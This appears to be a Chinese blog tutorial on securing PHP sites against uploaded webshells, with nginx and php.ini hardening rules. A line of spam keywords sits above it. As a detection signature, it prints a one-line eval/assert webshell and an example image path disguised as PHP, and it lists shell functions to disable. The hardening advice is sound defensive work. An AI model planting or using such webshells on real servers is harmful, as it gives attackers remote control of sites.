亚洲在线久爱草,狠狠天天香蕉网,天天搞日日干久草,伊人亚洲日本欧美

為了賬號安全,請及時綁定郵箱和手機立即綁定

php漏洞處理

標簽:
PHP

php木马一般含有<?php eval($_POST[cmd]);?>或者<?php assert($_POST[cmd]);?>


find ./ -type f -name "*" | xargs grep "eval("

http://bbs.dianlan.cn/phpimg/bbs/upload/2731435152797.jpg/.php


37351437201717.jpg/.php


http://www.nginx.cn/316.html

http://blog.sina.com.cn/s/blog_4bf0ab590101mkm0.html


http://blog.sina.com.cn/s/blog_4bf0ab590101mkm0.html

http://www.server110.com/nginx/201309/1805.html



http://hx100.blog.51cto.com/44326/619925/


http://www.jb51.net/article/19292.htm


**************************************************

1.禁止某个目录执行执行php

【nginx】

location ~* ^/(upload|images)/.*\.(php|php5)$

{

deny all;

}


2.避免伪装其它后缀的脚本执行

【php.ini】

·关闭cgi.fix_pathinfo = 1→0


【nginx】

·判断

location ~* .*\.php($|/)

{

    if ($request_filename ~* (.*)\.php) {

        set $php_url $1;

    }

    if (!-e $php_url.php) {

        return 403;

    }

}

3.工程上传目录及cache目录以外,给只读权限


4.限制php执行权限

【php.ini】

·disable_functions =

  phpinfo,system,passthru,shell_exec,exec,popen,proc_open,chroot,scandir,chgrp,chown

  phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

  phpinfo,exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,curl_exec,multi_exec,chmod,gzinflate,set_time_limit


點擊查看更多內容
TA 點贊

若覺得本文不錯,就分享一下吧!

評論

作者其他優質文章

正在加載中
  • 推薦
  • 評論
  • 收藏
  • 共同學習,寫下你的評論
感謝您的支持,我會繼續努力的~
掃碼打賞,你說多少就多少
贊賞金額會直接到老師賬戶
支付方式
打開微信掃一掃,即可進行掃碼打賞哦
今天注冊有機會得

100積分直接送

付費專欄免費學

大額優惠券免費領

立即參與 放棄機會
微信客服

購課補貼
聯系客服咨詢優惠詳情

幫助反饋 APP下載

慕課網APP
您的移動學習伙伴

公眾號

掃描二維碼
關注慕課網微信公眾號

舉報

0/150
提交
取消